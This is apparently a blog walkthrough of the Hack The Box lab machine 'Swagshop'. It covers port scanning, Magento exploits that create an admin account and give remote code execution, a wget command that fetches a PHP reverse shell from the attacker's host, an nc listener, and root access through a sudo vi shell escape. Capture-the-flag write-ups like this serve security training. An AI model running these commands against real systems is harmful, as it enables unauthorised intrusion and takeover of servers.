Hackthebox – Swagshop

As with any machine, we start with a portscan and find out that only ports 22 and 80 are open.

root@kalivm:~/swagshop# nmap -A -oN fullscan-A 10.10.10.140
Nmap scan report for 10.10.10.140
Host is up (0.016s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|   256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_  256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home page
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=8/17%OT=22%CT=1%CU=42455%PV=Y%DS=2%DC=T%G=Y%TM=5D57C53
OS:1%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10E%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 139/tcp)
HOP RTT      ADDRESS
1   16.82 ms 10.10.12.1
2   17.14 ms 10.10.10.140

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Aug 17 11:13:21 2019 -- 1 IP address (1 host up) scanned in 23.08 seconds

When browsing to the web server, it appears to be a magento eCommerce site.
Swagshop website
So looking at searchploit for any known exploits is the first step.

root@kalivm:~/swagshop# searchsploit magento
------------------------------------------ ----------------------------------------
 Exploit Title                            |  Path
                                          | (/usr/share/exploitdb/)
------------------------------------------ ----------------------------------------
Magento 1.2 - '/app/code/core/Mage/Admin/M| exploits/php/webapps/32808.txt
Magento 1.2 - '/app/code/core/Mage/Adminht| exploits/php/webapps/32809.txt
Magento 1.2 - 'downloader/index.php' Cross| exploits/php/webapps/32810.txt
Magento < 2.0.6 - Arbitrary Unserialize / | exploits/php/webapps/39838.php
Magento CE < 1.9.0.1 - (Authenticated) Rem| exploits/php/webapps/37811.py
Magento Server MAGMI Plugin - Multiple Vul| exploits/php/webapps/35996.txt
Magento Server MAGMI Plugin 0.7.17a - Remo| exploits/php/webapps/35052.txt
Magento eCommerce - Local File Disclosure | exploits/php/webapps/19793.txt
Magento eCommerce - Remote Code Execution | exploits/xml/webapps/37977.py 
eBay Magento 1.9.2.1 - PHP FPM XML eXterna| exploits/php/webapps/38573.txt
eBay Magento CE 1.9.2.1 - Unrestricted Cro| exploits/php/webapps/38651.txt
------------------------------------------ ----------------------------------------

After some errors, I found out that the required admin panel for this exploit is not under /admin, but under index.php/admin.

admin_panel

Replacing the target with the actual url, modifying the target_url to include the index.php file and replacing the username and password with user-input, I ran the slightly modified exploit and got an account.

root@kalivm:~/swagshop# cat 37977.py 
!/usr/bin/env python2
#Thanks to
# Zero cool, code breaker ICA, Team indishell, my father , rr mam, jagriti and DON  
import requests
import base64
import sys

target = sys.argv[1]
---snip---
target_url = target + "/index.php/admin/Cms_Wysiwyg/directive/index/"
---snip---
query = q.replace("\n", "").format(username=sys.argv[2], password=sys.argv[2])
---snip---
if r.ok:
 print "WORKED"
 print "Check {0}/admin with creds " + sys.argv[2] + ":"+ sys.argv[2] + "".format(target)
else:
 print "DID NOT WORK"
root@kalivm:~/swagshop# ./37977.py http://10.10.10.140 sedje
WORKED
Check {0}/admin with creds sedje:sedje

So now we should be able to log in using the user/password combination.

admin_login_successful

After some research I found a page containing a simple explanation on how to create a backdoor. Although interesting, the /downloader URL appeared to be removed so this was not a fruitful way of exploiting. After some searching and fiddling with other interesting topics such as this one about ‘FrogHopper’. Parts of it worked

froghopper was partially working

But other elements were seemingly impossible to get them to work. I was kinda lost so I decided to ask on the HTB Discord for a nudge and got pointed back to searchploit. Looking again at it, one Authenticated exploit stood out immediately so I decided to take a look at it.

root@kalivm:~/swagshop# searchsploit magento
------------------------------------------ ----------------------------------------
 Exploit Title                            |  Path
                                          | (/usr/share/exploitdb/)
------------------------------------------ ----------------------------------------
Magento 1.2 - '/app/code/core/Mage/Admin/M| exploits/php/webapps/32808.txt
Magento 1.2 - '/app/code/core/Mage/Adminht| exploits/php/webapps/32809.txt
Magento 1.2 - 'downloader/index.php' Cross| exploits/php/webapps/32810.txt
Magento < 2.0.6 - Arbitrary Unserialize / | exploits/php/webapps/39838.php
Magento CE < 1.9.0.1 - (Authenticated) Rem| exploits/php/webapps/37811.py
Magento Server MAGMI Plugin - Multiple Vul| exploits/php/webapps/35996.txt
Magento Server MAGMI Plugin 0.7.17a - Remo| exploits/php/webapps/35052.txt
Magento eCommerce - Local File Disclosure | exploits/php/webapps/19793.txt
Magento eCommerce - Remote Code Execution | exploits/xml/webapps/37977.py
eBay Magento 1.9.2.1 - PHP FPM XML eXterna| exploits/php/webapps/38573.txt
eBay Magento CE 1.9.2.1 - Unrestricted Cro| exploits/php/webapps/38651.txt
------------------------------------------ ----------------------------------------

It required some minimal modifications, you had to set the username and password on lines 32 and 33.

# Config.
username = 'sedje'
password = 'sedje'

After those were set, the first thing was try to run the exploit

/swagshop# python 37811.py http://10.10.10.140/index.php/admin/ "uname -a" 
Traceback (most recent call last):
  File "37811.py", line 69, in 
    tunnel = tunnel.group(1)
AttributeError: 'NoneType' object has no attribute 'group'

After looking at the erroneous line, it appeared hat a regular expression was looking for an ‘src=’ value

tunnel = re.search("src=\"(.*)\?ga=", request.read()) tunnel = tunnel.group(1)

So it appeared that the request URL just before line 69 was not entirely correct as it resulted in an empty group. Interestingly, this line contained an Ajax request with the statement of a certain period. After trying this request with several possible options in a python console, it resulted that the option of a period of 1 year was the right setting.

>>> request = br.open(url + 'block/tab_orders/period/1y/?isAjax=true', data='isAjax=true&form_key=' + key)
>>> request.read()
'<div style="margin:20px;">\n    <p class="switcher a-right" style="padding:5px 10px;">Select Range:\n    <select name="period" id="order_orders_period" onchange="changeDiagramsPeriod(this);">\n                                <option value="24h" >Last 24 Hours</option>\n                                <option value="7d" >Last 7 Days</option>\n                                <option value="1m" >Current Month</option>\n                                <option value="1y"  selected="selected">YTD</option>\n                                <option value="2y" >2YTD</option>\n            </select></p><br/>\n            <p style="width:587px;height:300px; margin:0 auto;"><img src="http://10.10.10.140/index.php/admin/dashboard/tunnel/key/b02444e1205c5c4436a14b8ada569b5b/?ga=YTo5OntzOjM6ImNodCI7czoyOiJsYyI7czozOiJjaGYiO3M6Mzk6ImJnLHMsZjRmNGY0fGMsbGcsOTAsZmZmZmZmLDAuMSxlZGVkZWQsMCI7czozOiJjaG0iO3M6MTQ6IkIsZjRkNGIyLDAsMCwwIjtzOjQ6ImNoY28iO3M6NjoiZGI0ODE0IjtzOjM6ImNoZCI7czoxMjoiZTpBQUFBQUFxcUFBIjtzOjQ6ImNoeHQiO3M6MzoieCx5IjtzOjQ6ImNoeGwiO3M6NTM6IjA6fDAxLzIwMTl8MDIvMjAxOXwwMy8yMDE5fDA1LzIwMTl8MDcvMjAxOXwxOnwwfDF8MnwzIjtzOjM6ImNocyI7czo3OiI1ODd4MzAwIjtzOjM6ImNoZyI7czoyMjoiMjUsMzMuMzMzMzMzMzMzMzMzLDEsMCI7fQ%253D%253D&h=017016eb2e41b7db0b569962bc2ae4a6" alt="chart" title="chart" /></p>\n    </div>\n'</code>

Since the box keeps getting reset, I just ran the first exploit again to be sure my account was present and the second script should be able to complete without issues.

root@kalivm:~/swagshop# ./37977.py http://10.10.10.140 sedje
WORKED
Check {0}/admin with creds sedje:sedje
root@kalivm:~/swagshop# python 37811.py http://10.10.10.140/index.php/admin/ "uname -a" 
Linux swagshop 4.4.0-146-generic #172-Ubuntu SMP Wed Apr 3 09:00:08 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

Seems like we’ve got a working RCE now! Next step is to get my shell across, and get shell access. Using just the default php shell would be more than sufficient so I modified it to contain the right IP and, for the ease of use, rename it to sedje.php. Execute the 37811 python script again with a wget and have a python web server running.

root@kalivm:~/swagshop# python 37811.py http://10.10.10.140/index.php/admin/ "wget -O /var/www/html/shell/sedje.php http://10.10.12.106:8000/sedje.php"

And meanwhile, in the other terminal

root@kalivm:~/swagshop# python -m SimpleHTTPServer 
Serving HTTP on 0.0.0.0 port 8000 ...
10.10.10.140 - - [29/Aug/2019 10:41:35] "GET /sedje.php HTTP/1.1" 200 -

Bingo, the shell uploaded, so now all wee need to do is start a listener and open the sedje.php file

shell_uploaded
After setting up the listener and clicking the php file, the shell is opened and we can start looking for the user’s home directory containing the flag.

root@kalivm:~/swagshop# nc -nvlp 1234
Listening on [0.0.0.0] (family 2, port 1234)
Connection from 10.10.10.140 32838 received!
Linux swagshop 4.4.0-146-generic #172-Ubuntu SMP Wed Apr 3 09:00:08 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 01:05:25 up 36 min,  0 users,  load average: 0.77, 1.11, 0.66
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ ls /home
haris
$ cat /home/haris/user.txt
a448877<NOFLAG>5e5ddf9f90aefbac8

Privilege escalation

After some browsing through the system and looking at the various configuration settings and files, I found one thing that was pretty interesting. A mistake in the sudo configuration!

$ sudo -l
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*

Seeing that vi is used with sudo capabilities as root, and knowing it is possible to drop to a shell from vi(m) with the :!/bin/bash command in vi(m), provides with the option to become root through this configuration mistake and obtain the flag.

$ sudo /usr/bin/vi /var/www/html/sedje
Vim: Warning: Output is not to a terminal
Vim: Warning: Input is not from a terminal

E558: Terminal entry not found in terminfo
'unknown' not known. Available builtin terminals are:
    builtin_amiga
    builtin_beos-ansi
    builtin_ansi
    builtin_pcansi
    builtin_win32
    builtin_vt320
    builtin_vt52
    builtin_xterm
    builtin_iris-ansi
    builtin_debug
    builtin_dumb
defaulting to 'ansi'
~
~
~
~
:!/bin/bash

id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
c2b087d6<NOFLAG>a3b86a130ac56721

   ___ ___
 /| |/|\| |\
/_| ยด |.` |_\           We are open! (Almost)
  |   |.  |
  |   |.  |         Join the beta HTB Swag Store!
  |___|.__|       https://hackthebox.store/password

                   PS: Use root flag as password!

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.